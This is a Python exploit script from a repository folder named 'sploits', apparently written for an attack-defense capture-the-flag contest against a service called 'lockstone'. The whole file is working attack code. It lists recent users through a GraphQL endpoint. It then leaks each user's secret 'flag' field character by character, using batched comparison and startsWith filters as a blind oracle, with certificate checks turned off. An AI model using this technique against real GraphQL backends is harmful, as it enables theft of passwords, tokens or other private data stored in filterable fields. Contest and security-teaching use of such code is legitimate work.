git » repo » main » tree

[main] / sploits / lockstone / spl_advanced.py 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

s = requests.session()

HOST = sys.argv[1]
FLAG_PREFIX = sys.argv[2]

def get_next_chars(flags):
  flag_ids = list(flags)

  query = "query {"
  for pos, user_id in enumerate(flag_ids):
    letter = chr(ord("A") + pos)
    start = flags[user_id]
    query += f'{letter}{1}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}9"}}}}){{id}}'
    query += f'{letter}{2}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}I"}}}}){{id}}'
    query += f'{letter}{3}:users(where:{{id:{{equals:"{user_id}"}},flag:{{lt:"{start}R"}}}}){{id}}'
  query += "}"

  json_data = {"query": query}
  ans = s.post(f"https://{HOST}:443/api/graphql", json=json_data, verify=False).json()["data"]

  user_id_to_abc = {}

  for pos, user_id in enumerate(flag_ids):
    letter = chr(ord("A") + pos)

    if ans[letter+"1"]:
      abc = "012345678"
    elif ans[letter+"2"]:
      abc = "9ABCDEFGH"
    elif ans[letter+"3"]:
      abc = "IJKLMNOPQ"
    else:
      abc = "RSTUVWXYZ"

    user_id_to_abc[user_id] = abc

  query = "query{"
  for pos, user_id in enumerate(flag_ids):
    letter = chr(ord("A") + pos)
    abc = user_id_to_abc[user_id]
    start = flags[user_id]
    for c in abc[:-1]:
      query += f'{letter}{c}:users(where:{{id:{{equals:"{user_id}"}},flag:{{startsWith:"{start}{c}"}}}}){{id}}'
  query += "}"

  json_data = {"query": query}

  ans = s.post(f"https://{HOST}:443/api/graphql", json=json_data, verify=False).json()["data"]
  ans = [a for a in ans if ans[a]]

  for pos, user_id in enumerate(flag_ids):
    abc = user_id_to_abc[user_id]
    letter = chr(ord("A") + pos)

    char = abc[-1]
    for c in abc:
      if letter + c in ans:
        char = c
        break

    flags[user_id] += char


def print_flags_by_ids(flag_ids):
  flags = {flag_id: FLAG_PREFIX for flag_id in flag_ids}
  for i in range(len(FLAG_PREFIX), len(FLAG_PREFIX)+32):
    get_next_chars(flags)

  for flag in flags.values():
    print(flag)


def get_id_list():
  json_data = {
    "query":"query{users(take:8,orderBy:{createdAt:desc}){id}}"
  }

  items = s.post(f"https://{HOST}:{443}/api/graphql", json=json_data, verify=False).json()["data"]["users"]

  id_list = [i["id"] for i in items]

  return id_list

user_ids = get_id_list()
print_flags_by_ids(user_ids)